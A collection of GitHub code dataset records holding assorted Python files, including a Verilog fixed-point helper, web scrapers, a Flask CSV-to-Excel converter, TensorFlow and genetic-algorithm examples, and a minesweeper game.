vtypes.SystemTask('signed', ldata), ldata)\n _rdata = vtypes.Mux(signed, vtypes.SystemTask('signed', rdata), rdata)\n return _ldata, _rdata\n \ndef shift_left(value, size, signed=True):\n if isinstance(value, vtypes.Int):\n value = value.value\n \n if isinstance(value, int) and isinstance(size, int):\n return value << size\n \n if isinstance(value, bool) and isinstance(size, int):\n return value << size\n \n return vtypes.Sll(value, size)\n\ndef shift_right(value, size, signed=True):\n if isinstance(value, vtypes.Int):\n value = value.value\n \n if isinstance(value, int) and isinstance(size, int):\n return value >> size\n \n if isinstance(value, bool) and isinstance(size, int):\n return value >> size\n \n return vtypes.Mux(signed, vtypes.Sra(value, size), vtypes.Srl(value, size))\n\n#-------------------------------------------------------------------------------\ndef _max_mux(a, b):\n return vtypes.Mux(a > b, a, b)\n\n#-------------------------------------------------------------------------------\ndef FixedInput(m, name, width=32, point=0, signed=False):\n var = m.Input(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedOutput(m, name, width=32, point=0, signed=False):\n var = m.Output(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedOutputReg(m, name, width=32, point=0, signed=False):\n var = m.OutputReg(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedReg(m, name, width=32, point=0, signed=False):\n var = m.Reg(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedWire(m, name, width=32, point=0, signed=False):\n var = m.Wire(name, width, signed=signed)\n return Fixed(var, point, signed)\n\n#-------------------------------------------------------------------------------\nclass Fixed(vtypes.VeriloggenNode):\n def __init__(self, value, point, signed=None, raw=True):\n vtypes.VeriloggenNode.__init__(self)\n self.value = value if raw else to_fixed(value, point)\n self.point = point\n self.signed = vtypes.get_signed(value) if signed is None else signed\n \n def __hash__(self):\n return hash((id(self), self.object_id))\n\n def _adjust(self, value):\n lpoint = self.point\n if not isinstance(value, Fixed):\n rvalue = value\n rsigned = vtypes.get_signed(value)\n rpoint = 0\n else:\n rvalue = value.value\n rsigned = value.signed\n rpoint = value.point\n\n ldiff = vtypes.Mux(lpoint <= rpoint, 0, lpoint - rpoint)\n rdiff = vtypes.Mux(lpoint >= rpoint, 0, rpoint - lpoint)\n v = vtypes.Mux(lpoint>rpoint, shift_left(rvalue, ldiff, rsigned),\n vtypes.Mux(lpoint> self.point\n\n @property\n def dec_part(self):\n mask = vtypes.Mux(self.point==0, 0, vtypes.Repeat(vtypes.Int(1, width=1), self.point))\n return self.value & mask\n\n def _binary_op(self, op, r):\n lvalue = self.value\n lpoint = self.point\n lsigned = self.signed\n \n if not isinstance(r, Fixed):\n rvalue = r\n rsigned = vtypes.get_signed(r)\n rpoint = 0\n else:\n rvalue = r.value\n rsigned = r.signed\n rpoint = r.point\n\n point = _max_mux(lpoint, rpoint)\n signed = lsigned and rsigned\n ldata, rdata = adjust(lvalue, rvalue, lpoint, rpoint, signed)\n\n data = op(ldata, rdata)\n\n return Fixed(data, point, signed)\n\n def _binary_logical_op(self, op, r):\n lvalue = self.value\n \n if not isinstance(r, Fixed):\n rvalue = r\n else:\n rvalue = r.value\n\n return op(lvalue, rvalue)\n\n def __add__(self, r):\n return self._binary_op(vtypes.Plus, r)\n\n def __sub__(self, r):\n return self._binary_op(vtypes.Minus, r)\n\ndef FixedConst(value, point, raw=False):\n return Fixed(value, point, raw=raw)\n","repo_name":"jszheng/codegen","sub_path":"veriloggen/types/fixed.py","file_name":"fixed.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71480942238","text":"#!/usr/bin/python3\n\nimport csv\nimport time\nfrom pprint import pprint\n\nimport js2xml\nimport requests\n\nFIELDNAMES = [\n \"name\",\n \"street_addr\",\n \"city\",\n \"state\",\n \"zipcode\",\n \"phone\",\n \"bed_count\",\n \"web_url\",\n]\n\n\ndef main():\n params = {\"callback\": \"locationDataCallback\", \"_\": int(time.time())}\n\n resp = requests.get(\n \"https://www.chslocationsmap.com/data/map/default/locations.json\", params=params\n )\n print(resp.url)\n\n parsed = js2xml.parse(resp.text)\n\n out_f = open(\"locations.csv\", \"w\", encoding=\"utf-8\")\n\n csv_writer = csv.DictWriter(out_f, fieldnames=FIELDNAMES, lineterminator=\"\\n\")\n csv_writer.writeheader()\n\n for h in parsed.xpath('//property[@name=\"hospitals\"]/array/object'):\n name = h.xpath('.//property[@name=\"name\"]/string/text()')[0]\n street_addr = h.xpath('.//property[@name=\"street\"]/string/text()')[0]\n city = h.xpath('.//property[@name=\"city\"]/string/text()')[0]\n state = h.xpath(\"../../../../@name\")[0]\n zipcode = h.xpath('.//property[@name=\"zip\"]/string/text()')[0]\n phone = h.xpath('.//property[@name=\"phone\"]/string/text()')[0]\n if \"<\" in phone:\n phone = None\n\n try:\n bed_count = h.xpath('.//property[@name=\"bedCount\"]/number/@value')[0]\n except:\n bed_count = None\n\n web_url = h.xpath('.//property[@name=\"websiteUrl\"]/string/text()')[0]\n\n row = {\n \"name\": name,\n \"street_addr\": street_addr,\n \"city\": city,\n \"state\": state,\n \"zipcode\": zipcode,\n \"phone\": phone,\n \"bed_count\": bed_count,\n \"web_url\": web_url,\n }\n\n pprint(row)\n\n csv_writer.writerow(row)\n\n out_f.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rl1987/dolthub-bounty-hospital-price-transparency-v3","sub_path":"CHS/1_scrape_locations.py","file_name":"1_scrape_locations.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27324572081","text":"import csv, re, argparse\nfrom collections import OrderedDict\n\nmultich_set = set()\ndefinitions = OrderedDict()\n\n##patterns = OrderedDict()\npattern_lst = [] # a list of tuples (cont, iclass, expr, weight, comment)\nsingleton_lst = [] # list of tuples (cont, iclass, input, output, weight, comment)\ncont_set = set()\niclass_set = set()\n\ndef extract_multichs(regexp):\n global multich_set, definitions\n rege = re.sub(r\"([][()|\\$\\&\\-\\+*: ]|\\.[iul]|\\.o\\.)+\", \",\", regexp)\n lst = re.split(r\",\", rege)\n for nm in lst:\n if len(nm) > 1 and (nm not in definitions):\n multich_set.add(nm)\n return\n\ndef add_perc(str):\n return re.sub(r\"([{'}])\", r\"%\\1\", str)\n\ndef proj_down_regex(str):\n lst = re.split(r\"([\\]\\[\\|\\-\\+\\* ]+|\\.[iul]|\\.o\\.)\", str)\n downlst = [re.sub(r\"([a-zåäö'øØ0]):({[a-zåäö'øØ]+}|0)\", r\"\\2\", el) for el in lst]\n reslst = [re.sub(r\"^0$\", r\"\", el) for el in downlst]\n res = \"\".join(reslst)\n res = re.sub(r\"\\s+\\[\\s*\\|\\s*\\]\\s*\", r\" \", res)\n res = re.sub(r\"\\s+\", r\" \", res)\n res = re.sub(r\"\\s+$\", r\"\", res)\n return res\n\ndef patterns2converter(outfile):\n global multich_set, iclass_set, cont_set\n print(\"Multichar_Symbols\", file=outfile)\n print(\" \", \" \".join(sorted(multich_set)), file=outfile)\n print(\" \", \" \".join(sorted(iclass_set)), file=outfile)\n print(\" \", \" \".join(sorted(cont_set)), file=outfile)\n print(\"Definitions\", file=outfile)\n for dn in definitions.keys():\n print(\" \", dn, \"=\", add_perc(definitions[dn]), \";\", file=outfile)\n print(\"LEXICON Root\", file=outfile)\n for cont, iclass, input, output, weight, comment in singleton_lst:\n w = ' \"weight: ' + weight + '\"' if weight else \"\"\n i_class = re.sub(r\"([*])\", r\"%\\1\", iclass)\n print(input + i_class + \":\" + output ,\n cont, w, '; !', comment, file=outfile)\n for cont, iclass, pat, weight, comment in pattern_lst:\n ##w = ' \"weight: ' + weight + '\"' if weight else \"\"\n w = \"::\" + weight if weight else \"\"\n i_class = re.sub(r\"([*])\", r\"%\\1\", iclass)\n print(\"<\", add_perc(pat[1:-1]),\n i_class + \":0\" + w + \" >\",\n cont, \"; !\", comment, file=outfile)\n for cont in sorted(list(cont_set)):\n print(\"LEXICON\", cont, file=outfile)\n print(\":% \" + cont, \"# ;\", file=outfile)\n return\n\ndef patterns2guesserlex(outfile):\n print(\"Multichar_Symbols\", file=outfile)\n print(\" \", \" \".join(sorted(multich_set)), file=outfile)\n print(\" \", \" \".join(sorted(cont_set)), file=outfile)\n print(\"Definitions\", file=outfile)\n for dn in definitions.keys():\n downde = proj_down_regex(definitions[dn])\n print(\" \", dn, \"=\", add_perc(downde), \";\", file=outfile)\n print(\"LEXICON Root\", file=outfile)\n for cont, iclass, input, output, weight, comment in singleton_lst:\n w = ' \"weight: ' + weight + '\"' if weight else \"\"\n print(output, cont, w, '; !', comment, file=outfile)\n for cont, iclass, pat, weight, comment in pattern_lst:\n w = '\"weight: '+weight+'\"' if weight else \"\"\n downpat = proj_down_regex(pat[1:-1])\n print(\"<\", add_perc(downpat), \">\", cont, w, \";\", file=outfile)\n return\n\nargparser = argparse.ArgumentParser(\n \"python3 entry-pattern.py\",\n description=\"Writes a LEXC file for either a guesser or a converter\")\nargparser.add_argument(\n \"input\", help=\"A csv input file containing the patterns as regular expressions\")\nargparser.add_argument(\n \"output\", help=\"A LEXC output file. The patterns are \"\n \"converted into appropriate LEX entries.\")\nargparser.add_argument(\n \"-c\", \"--classes\",\n help=\"Produce a converter instead of a guesser and \"\n \"output a file containing all inflectional classe identifiers \"\n \"found in the patterns. Output them as a space-separated string\")\nargparser.add_argument(\"-d\", \"--delimiter\", default=\",\",\n help=\"CSV field delimiter (default is ',')\")\nargparser.add_argument(\n \"-v\", \"--verbosity\", default=0, type=int,\n help=\"level of diagnostic output\")\nargs = argparser.parse_args()\n\npatfile = open(args.input, \"r\")\npat_rdr = csv.DictReader(patfile, delimiter=args.delimiter)\nprevID = \";;;\"\nfor r in pat_rdr:\n if args.verbosity >= 10:\n print(r)\n cont, i_class, mfon, comment = r['CONT'], r['ICLASS'], r['MPHON'], r['COMMENT']\n if cont != \"\" and cont[0] == '!':\n if args.verbosity >= 10:\n print(\"- it is a comment line\")\n continue\n if cont == \"Define\":\n if args.verbosity >= 10:\n print(\"- it is a definition\")\n definitions[i_class] = mfon\n else:\n cont_set.add(cont)\n iclass_set.add(i_class)\n m = re.match(r\"^\\s*(<.*>)\\s*([0-9]*)\\s*$\", mfon)\n if m: # it looks like a reg ex pattern\n if args.verbosity >= 10:\n print(\"- it is a pattern\")\n regex = m.group(1)\n weight = m.group(2)\n pattern_lst.append((cont, i_class, regex, weight, comment))\n continue\n m = re.match(r\"^\\s*([a-zåäöšž']+):([a-zåäöšžA-ZÅÄÖŠŽ{Ø'}]+)\\s*([0-9]*)\\s*$\",\n mfon)\n #print(cont, i_class, mfon)###\n if m: # it looks like a direct result for a single entry\n if args.verbosity >= 10:\n print(\"- it is a single entry\")\n singleton_lst.append((cont, i_class,\n m.group(1), m.group(2), m.group(3),\n comment))\n else: # not valid at all\n print(\"***\", r, \"***\")\n\npatfile.close()\n#print(singleton_lst)###\n\nfor cont, iclass, pat, weight, comment in pattern_lst:\n extract_multichs(pat[1:-1])\nfor dn,pe in definitions.items():\n extract_multichs(pe)\n\noutfile = open(args.output, \"w\")\nif args.classes:\n patterns2converter(outfile)\n if args.classes:\n classfile = open(args.classes, \"w\")\n print(\" \".join(sorted(list(iclass_set))), file=classfile)\n classfile.close()\nelse:\n patterns2guesserlex(outfile)\n\n","repo_name":"koskenni/pytwolc","sub_path":"entry-pattern.py","file_name":"entry-pattern.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"34184596510","text":"\"\"\"\ntitle: Greatest Common Divisor of Strings\n\nFor two strings s and t, we say \"t divides s\" if and\n\nonly if s = t + ... + t (i.e., t is concatenated with itself one or more times).\n\nGiven two strings str1 and str2,\nreturn the largest string x such that x divides both str1 and str2.\n\nExample 1:\n Input: str1 = \"ABCABC\", str2 = \"ABC\"\n Output: \"ABC\"\n\nExample 2:\n Input: str1 = \"ABABAB\", str2 = \"ABAB\"\n Output: \"AB\"\n\nExample 3:\n Input: str1 = \"LEET\", str2 = \"CODE\"\n Output: \"\"\n\"\"\"\n\n\nimport math\n\n\nclass Solution(object):\n def gcdOfStrings(self, str1, str2):\n \"\"\"\n :type str1: str\n :type str2: str\n :rtype: str\n \"\"\"\n n = len(str1)\n m = len(str2)\n\n if (str1 + str2) == (str2 + str1):\n # 找最大公因數 (by string)\n gcd_idx = math.gcd(n, m)\n\n return str1[:gcd_idx]\n\n else:\n return \"\"\n\n\nsolution = Solution()\n\nstr1 = \"ABCABC\"\nstr2 = \"ABC\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)\n\nstr1 = \"ABABAB\"\nstr2 = \"ABAB\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)\n\nstr1 = \"LEET\"\nstr2 = \"CODE\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)","repo_name":"RexIscodingnow/python_practice","sub_path":"leetcode_QA/Greatest Common Divisor of Strings.py","file_name":"Greatest Common Divisor of Strings.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34617823703","text":"import json\nimport re\n\n\n@service(\"irrigation_unlimited.list_config\")\ndef irrigation_unlimited_list_config(entity_id, section, first=None):\n \"\"\"yaml\n name: List configuration\n description: Load up an input_select entity with Irrigation Unlimited config data\n fields:\n entity_id:\n description: An entity from the input_select domain\n example: input_select.irrigation_unlimited_entities\n required: true\n selector:\n entity:\n domain: input_select\n\n section:\n description: The type of list to load up\n example: entities\n required: true\n selector:\n select:\n options:\n - entities\n - sequences\n\n first:\n description: The first item in the list\n example: \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n\r\n@app.route('/transform', methods=[\"POST\"])\r\ndef transform_view():\r\n f = request.files['data_file']\r\n\r\n # Check for upload file\r\n if not f:\r\n return \"No file\"\r\n if '.csv' in f.filename:\r\n outfile = reportdate + '_' + f.filename[:-4] + '.xlsx'\r\n else:\r\n return \"Selected file is not a csv, please check your file and try again\" \r\n\r\n # Convert uploaded file from stream to dataframe\r\n stream = io.StringIO(f.stream.read().decode(\"UTF8\"), newline=None)\r\n \r\n # Prep stream for writing to dataframe\r\n stream.seek(0)\r\n \r\n # Write stream to dataframe\r\n df = pd.read_csv(stream)\r\n\r\n # Populate array with list of unique employee names from input file\r\n employeelist = getEmplList(df)\r\n\r\n # Setup excel file for input \r\n outputStream = BytesIO()\r\n writer = pd.ExcelWriter(outputStream, engine='xlsxwriter')\r\n \r\n # Create summary array\r\n EmployeeSummary = []\r\n for e in employeelist:\r\n employeeresult = df[df['EmployeesInvolved'].str.contains(e, case=False)]\r\n dev_count = len(employeeresult)\r\n EmployeeSummary.append([e, dev_count])\r\n \r\n # Convert summary array to dataframe\r\n SummaryResult = pd.DataFrame(EmployeeSummary)\r\n \r\n # Write summary to summary tab in excel file\r\n dropList = [\"Employee\", \"Dev Count\"]\r\n SummaryResult.to_excel(writer, sheet_name='Summary', index=False)\r\n\r\n # Write employee specific tabs and data to excel file\r\n dropList = [\"Center\", \"DaysOpen\", \"Status\", \"DateClosed\", \"RootCause\", \"AssociatedDeviationCAPANumber\"]\r\n for e in employeelist:\r\n listResult = df[df['EmployeesInvolved'].str.contains(e,case= False)]\r\n listResult = listResult.drop(dropList, axis=1)\r\n listResult.to_excel(writer, sheet_name=e, index=False)\r\n \r\n # Close excel file and prepare to send file back to user\r\n writer.close()\r\n outputStream.seek(0)\r\n\r\n # Return processed file to user\r\n return send_file(outputStream, attachment_filename=outfile, as_attachment=True)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0', debug=True)\r\n","repo_name":"CrypticDog/webdevparser","sub_path":"webdevparser.py","file_name":"webdevparser.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32088164194","text":"from bs4.element import ProcessingInstruction\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.parse\nimport json\ndef getDetails(username):\n url=f'https://www.github.com/{username}/'\n r=requests.get(url)\n # print(url)\n htmlContent=r.content\n soup=BeautifulSoup(htmlContent,'html.parser')\n try:\n \n name=(soup.find('span',class_='p-name vcard-fullname d-block overflow-hidden').text)\n # print(name)\n username=(soup.find('span',class_='p-nickname vcard-username d-block').text)\n # print(username)\n imageurl=soup.find('img',class_='avatar avatar-user width-full border color-bg-default').get('src')\n # print(imageurl)\n\n #bio\n bio='None'\n if soup.find('div',class_='p-note user-profile-bio mb-3 js-user-profile-bio f4'):\n bio=(soup.find('div',class_='p-note user-profile-bio mb-3 js-user-profile-bio f4').text)\n # following and starts\n try:\n f=(soup.find('div',class_=\"flex-order-1 flex-md-order-none mt-2 mt-md-0\").text)\n followdetails=((f.split()))\n except :\n followdetails='000000'\n\n #details\n details={'homeLocation': 'None', 'url': 'None', 'twitter': 'None','worksFor':'None','bio':'None'}\n det=soup.find('ul',class_='vcard-details')\n for d in det.find_all('li'):\n\n if d.find('a') == None:\n details[d.get('itemprop')]=\"\".join(d.text.split())\n else:\n details[d.get('itemprop')]=d.find('a').get('href')\n #contributions\n c=soup.find('h2',class_='f4 text-normal mb-2').text\n #organizations\n org={}\n o=soup.find('div',class_='border-top color-border-secondary pt-3 mt-3 clearfix hide-sm hide-md')\n if o is None:\n pass\n else:\n\n z=o.find_all('a',class_='avatar-group-item')\n for i in z:\n link=f\"https://github.com/{str(i.get('href'))}\"\n org[i.get('aria-label')]=link\n #pinned projects\n p=soup.find_all('p',class_=\"pinned-item-desc color-text-secondary text-small d-block mt-2 mb-3\")\n repo=soup.find_all('span',class_='repo')\n pinedpeojectstitle=[]\n # pinedprojectsinfo=[]\n for i in repo:\n pinedpeojectstitle.append(\"\".join(i.text.split()))\n\n # for i in p:\n # pinedprojectsinfo.append(\" \".join(i.text.split()))\n # projects=(json.dumps(dict(zip(pinedpeojectstitle,pinedprojectsinfo)),indent=4))\n projects=pinedpeojectstitle\n except AttributeError:\n return 'Enter valid username!'\n except :\n return 'Something went wrong!'\n details={\n 'profilelink':url,\n 'name':\"\".join(name.split()),\n 'username':\"\".join(username.split()),\n 'image':imageurl,\n 'bio':\"\".join(bio.split()),\n 'worksfor':details['worksFor'],\n 'location':details['homeLocation'],\n 'twitter':details['twitter'],\n 'link':details['url'],\n 'follower':followdetails[0],\n 'following':followdetails[3],\n 'star':followdetails[-1],\n 'contributionsinthelastyear':c.split()[0],\n 'organization':org,\n 'pinnedprojects': projects}\n \n return dict(details)\n\n\n\n","repo_name":"patilharss/github-profile-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"18999178336","text":"#The central unit of data in TensorFlow is the tensor\n#TensorFlow Core programs as consisting of two discrete sections:\n# Building the computational graph.\n# Running the computational graph.\n\nimport tensorflow as tf\n\n#To actually evaluate the nodes, we must run the computational graph within a session\nwith tf.Session() as sess:\n node1 = tf.constant(3.0, dtype=tf.float32)\n node2 = tf.constant(4.0) # also tf.float32 implicitly\n print(node1, node2)\n print(sess.run([node1, node2]))\n\n #We can build more complicated computations by combining Tensor nodes with operations (Operations are also nodes.)\n node3 = tf.add(node1, node2)\n print(\"node3: \", node3)\n print(\"sess.run(node3): \",sess.run(node3))\n\n #A graph can be parameterized to accept external inputs, known as placeholders. A placeholder is a promise to provide a value later.\n a = tf.placeholder(tf.float32)\n b = tf.placeholder(tf.float32)\n adder_node = a + b # + provides a shortcut for tf.add(a, b)\n\n #We can evaluate this graph with multiple inputs by using the feed_dict parameter to specify Tensors that provide concrete values to these placeholders:\n print(sess.run(adder_node, {a: 3, b:4.5}))\n print(sess.run(adder_node, {a: [1,3], b: [2, 4]}))#print(sess.run(adder_node, feed_dict={a: [1,3], b: [2, 4]}))\n\n #We can make the computational graph more complex by adding another operation. For example,\n add_and_triple = adder_node * 3.\n print(sess.run(add_and_triple, {a: 3, b:4.5}))\n\n #To make the model trainable, we need to be able to modify the graph to get new outputs with the same input. Variables allow us to add trainable parameters to a graph\n W = tf.Variable([.3], dtype=tf.float32)\n b = tf.Variable([-.3], dtype=tf.float32)\n x = tf.placeholder(tf.float32)\n linear_model = W * x + b\n\n #To initialize all the variables in a TensorFlow program, you must explicitly call a special operation as follows:\n init = tf.global_variables_initializer()\n sess.run(init)\n\n #Since x is a placeholder, we can evaluate linear_model for several values of x simultaneously as follows:\n print(sess.run(linear_model, {x:[1,2,3,4]}))\n\n #A loss function measures how far apart the current model is from the provided data\n # sum all the squared errors to create a single scalar that abstracts the error\n y = tf.placeholder(tf.float32)\n squared_deltas = tf.square(linear_model - y)\n loss = tf.reduce_sum(squared_deltas)\n print(sess.run(loss, {x:[1,2,3,4], y:[0,-1,-2,-3]}))\n\n #We could improve this manually by reassigning the values of W and b to the perfect values of -1 and 1\n #fixW = tf.assign(W, [-1.])\n #fixb = tf.assign(b, [1.])\n #sess.run([fixW, fixb])\n #print(sess.run(loss, {x:[1,2,3,4], y:[0,-1,-2,-3]}))\n\n #TensorFlow provides optimizers that slowly change each variable in order to minimize the loss function. The simplest optimizer is gradient descent\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n sess.run(init) # reset values to incorrect defaults.\n for i in range(1000):\n sess.run(train, {x:[1,2,3,4], y:[0,-1,-2,-3]})\n\n print(sess.run([W, b]))\n\n # evaluate training accuracy\n # training data\n x_train = [1,2,3,4]\n y_train = [0,-1,-2,-3]\n curr_W, curr_b, curr_loss = sess.run([W, b, loss], {x:x_train, y:y_train})\n print(\"W: %s b: %s loss: %s\"%(curr_W, curr_b, curr_loss))\n\n#Destroy session","repo_name":"chungvodim/ComputerVision","sub_path":"ComputerVision/DigitsRecognition/TensorFlow_GetStarted.py","file_name":"TensorFlow_GetStarted.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41804764396","text":"import GeneticFunctions as gf\nimport numpy as np\nimport imageio\nimport os\nimport cv2\n\ndef run(image, generation_size, population_size, mutation_percent, flag_filter):\n target_image = imageio.imread(image, pilmode=\"RGB\")\n \n if flag_filter == 1:\n target_image = cv2.GaussianBlur(target_image, (5,5), sigmaX = 0)\n\n target_chromosome = gf.image_to_chromossome(target_image)\n image_shape = target_image.shape\n\n num_parents_mating = population_size//2\n\n population = gf.generate_initial_population(image_shape, population_size)\n\n print('\\n Target Fitnes', np.sum(target_chromosome), '\\n')\n\n for iteration in range(generation_size + 1):\n qualities = gf.calculate_population_fitness(target_chromosome, population)\n parents = gf.select_mating_pool(population, qualities, num_parents_mating)\n population = gf.crossover(parents, image_shape, population_size)\n population = gf.mutation(population, num_parents_mating, mutation_percent)\n gf.print_and_save_image(iteration, target_image, qualities, population, image_shape, 500, os.curdir+'//')\n\nrun('heart.png', 10000, 64, 0.05, 1)","repo_name":"albertoromanhol/ufmg-artificial-inteligence-aerospace","sub_path":"trabalho/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31799309396","text":"#\n# This program gets the lists we are interested in\n#\n\nimport json\nimport sys\nimport re\n\ntargets = [\"Tarantino, Quentin\", \"Anderson, Wes\", \"Thurman, Uma\", \"McDormand, Frances\", \"Keitel, Harvey\", \"Murray, Bill\"]\n\ndef main():\n flag = \"\"\n movies_cast = {}\n repeated = {}\n if len(sys.argv) == 2 and sys.argv[1] == \"-m\":\n flag = \"-m\"\n with open(f\"movies-cast{flag}.json\", \"r\", encoding=\"ISO-8859-1\") as f:\n movies = json.load(f)\n for full_title, v in movies.items():\n for targ in targets:\n if (targ in v[\"actors\"]) or (targ in v[\"directors\"]):\n m = re.match(\"(?P.+?) \\((?P<year>[0-9\\?]+?)([\\/IVXLCD]+)*\\)$\", full_title)\n movie = m.group(\"title\")\n year = m.group(\"year\")\n #print(full_title)\n #print(movie)\n if movies_cast.get(movie):\n if not repeated.get(movie):\n tmp = movies_cast[movie]\n movies_cast[movie + \" \" + tmp[\"year\"]] = tmp\n movies_cast.pop(movie)\n repeated[movie] = True\n movie = movie + \" \" + year\n movies_cast[movie] = v\n movies_cast[movie][\"year\"] = year\n break\n actors = []\n directors = []\n movies = {}\n actors_movies = {}\n directors_movies = {}\n for name, v in movies_cast.items():\n movies[name] = v[\"year\"]\n for director in v[\"directors\"]:\n if not directors_movies.get(director):\n directors.append(director)\n directors_movies[director] = {}\n directors_movies[director][name] = v[\"year\"]\n for actor in v[\"actors\"]:\n if not actors_movies.get(actor):\n actors.append(actor)\n actors_movies[actor] = {}\n actors_movies[actor][name] = v[\"year\"]\n with open(f\"target-actors{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(actors, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-directors{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(directors, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-actors-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(actors_movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-directors-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(directors_movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-movies{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(movies, indent=1, ensure_ascii=False).encode(\"utf8\"))\n with open(f\"target-movies-cast{flag}.json\", \"wb+\") as f:\n f.write(json.dumps(movies_cast, indent=1, ensure_ascii=False).encode(\"utf8\"))\n\nif __name__ == '__main__':\n main()\n","repo_name":"robotenique/movies-ontology","sub_path":"get_target.py","file_name":"get_target.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"60"} +{"seq_id":"31664112523","text":"\nimport screen\n\n\nclass BlockObj():\n def __init__(self, x, y):\n name = 'block_%d_%d' % (x, y)\n posx = x * 64 + 32\n posy = y * 64 + 32\n images = [\n './pics/0.png', './pics/1.png', './pics/2.png',\n './pics/3.png', './pics/4.png', './pics/5.png',\n './pics/6.png', './pics/7.png', './pics/8.png',\n './pics/mine2.png', './pics/flag.png',\n './pics/unknown.png', # 11\n './pics/mine.png', # 12\n './pics/mine3.png' # 13\n ]\n self.body = screen.create_sprite(name, self, images, posx, posy)\n self.body.switch_costume(11)\n self.mine = False\n self.x = x\n self.y = y\n self.opened = False\n self.flaged = False\n\n # class method function\n def flag(self):\n if self.opened:\n return\n if not self.flaged:\n self.body.switch_costume(10)\n self.flaged = True\n else:\n self.body.switch_costume(11)\n self.flaged = False\n\n def open(self):\n if self.opened == True or self.flaged:\n return\n self.opened = True\n print('open', self.body.name)\n if self.mine == True:\n self.body.switch_costume(9)\n else:\n blocks = self.find_neighbor()\n n = 0\n for b in blocks:\n if b.mine == True:\n n += 1\n self.body.switch_costume(n)\n if n == 0:\n for b in blocks:\n b.open()\n pass\n\n def find_neighbor(self):\n blocks = []\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y - 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x - 1, self.y + 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x, self.y + 1))\n if b is not None:\n blocks.append(b)\n b = screen.get_sprite_owner('block_%d_%d' % (self.x + 1, self.y + 1))\n if b is not None:\n blocks.append(b)\n return blocks\n\n\ndef put_mines(row, column, num):\n while num > 0:\n x = screen.random_num(0, column)\n y = screen.random_num(0, row)\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b and b.mine != True:\n b.mine = True\n num -= 1\n\n\ndef create_blocks(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n # create blocks\n for y in y_range:\n for x in x_range:\n BlockObj(x, y)\n # put mine\n put_mines(row, column, 10)\n\n\ndef game_is_win(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if not b.mine and not b.opened:\n return False\n return True\n\ndef game_is_lost(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b.mine and b.opened:\n return True\n return False\n\n\ndef game_over(row, column):\n x_range = range(0, column)\n y_range = range(0, row)\n for y in y_range:\n for x in x_range:\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if not b.opened:\n if b.mine:\n if b.flaged:\n b.body.switch_costume(13)\n else:\n b.body.switch_costume(12)\n else:\n b.open()\n\ndef on_mouse_down(pos, button):\n print(pos, button)\n x = screen.mouse_x // 64\n y = screen.mouse_y // 64\n b = screen.get_sprite_owner('block_%d_%d' % (x, y))\n if b is not None:\n if screen.mouse_down('left'):\n b.open()\n if screen.mouse_down('right'):\n b.flag()\n # check if win\n if game_is_win(10, 10):\n print('WIN')\n game_over(10, 10)\n screen.set_event(6, None)\n if game_is_lost(10, 